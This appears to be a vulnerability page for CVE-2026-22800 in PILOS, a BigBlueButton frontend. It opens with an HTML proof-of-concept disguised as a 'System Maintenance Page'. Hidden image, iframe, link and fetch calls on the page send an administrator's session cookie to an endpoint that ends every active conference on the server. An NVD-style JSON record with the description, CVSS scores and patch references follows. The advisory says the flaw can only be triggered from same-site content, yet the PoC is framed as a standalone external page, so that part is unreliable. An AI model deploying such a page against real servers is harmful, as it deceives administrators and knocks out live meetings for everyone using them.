CVE-2026-22800

<!-- CVE-2026-22800 CSRF PoC - Terminate All Video Conferences --> <!-- This PoC demonstrates the CSRF vulnerability in PILOS admin API --> <!-- Attack requires: 1) Valid admin session, 2) Admin visits this page --> <!DOCTYPE html> <html> <head> <title>Conference System Maintenance</title> </head> <body> <h1>System Maintenance Page</h1> <p>Loading conference resources...</p> <!-- Automatic GET request to terminate all conferences --> <!-- Replace TARGET_URL with actual PILOS instance URL --> <img src="https://TARGET_URL/api/v1/admin/conferences/terminate-all" alt="Conference thumbnail" style="display:none;" /> <!-- Alternative: Auto-submit link (clickable) --> <a href="https://TARGET_URL/api/v1/admin/conferences/terminate-all" style="display:none;">Conference Resources</a> <!-- Alternative: iframe-based trigger --> <iframe src="https://TARGET_URL/api/v1/admin/conferences/terminate-all" style="display:none;"></iframe> <script> // Force immediate request on page load window.onload = function() { // Using fetch to trigger the vulnerable endpoint fetch('https://TARGET_URL/api/v1/admin/conferences/terminate-all', { method: 'GET', credentials: 'include' // Include admin session cookie }).then(response => { console.log('Conference termination triggered'); }).catch(err => { console.error('Request failed:', err); }); }; </script> </body> </html>

{"cve": {"id": "CVE-2026-22800", "sourceIdentifier": "[email protected]", "published": "2026-01-12T23:15:52.747", "lastModified": "2026-01-21T18:42:22.607", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PILOS (Platform for Interactive Live-Online Seminars) is a frontend for BigBlueButton. Prior to 4.10.0, Cross-Site Request Forgery (CSRF) vulnerability exists in an administrative API endpoint responsible for terminating all active video conferences on a single server. The affected endpoint performs a destructive action but is exposed via an HTTP GET request. Although proper authorization checks are enforced and the endpoint cannot be triggered cross-site, the use of GET allows the action to be implicitly invoked through same-site content (e.g. embedded resources rendered within the application). As a result, an authenticated administrator who views crafted content within the application may unknowingly trigger the endpoint, causing all active video conferences on the server to be terminated without explicit intent or confirmation. This vulnerability is fixed in 4.10.0."}, {"lang": "es", "value": "PILOS (Plataforma para Seminarios Interactivos en Vivo en Línea) es un frontend para BigBlueButton. Antes de la versión 4.10.0, existe una vulnerabilidad de falsificación de petición en sitios cruzados (CSRF) en un endpoint de API administrativo responsable de terminar todas las videoconferencias activas en un único servidor. El endpoint afectado realiza una acción destructiva pero está expuesto a través de una petición HTTP GET. Aunque se aplican comprobaciones de autorización adecuadas y el endpoint no puede ser activado de forma cruzada, el uso de GET permite que la acción sea invocada implícitamente a través de contenido del mismo sitio (por ejemplo, recursos incrustados renderizados dentro de la aplicación). Como resultado, un administrador autenticado que visualice contenido malicioso dentro de la aplicación podría activar el endpoint sin saberlo, provocando que todas las videoconferencias activas en el servidor sean terminadas sin intención explícita o confirmación. Esta vulnerabilidad está corregida en la versión 4.10.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:N/A:L", "baseScore": 2.4, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 0.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:N/A:H", "baseScore": 4.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:thm:pilos:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.10.0", "matchCriteriaId": "22DA1502-AFE6-4A80-B427-161C9B7726EB"}]}]}], "references": [{"url": "https://github.com/THM-Health/PILOS/commit/d9ab9bb7ac0a8581c25e24cb7db2152d40be4d1b", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/THM-Health/PILOS/security/advisories/GHSA-r24c-9p4j-rqw9", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}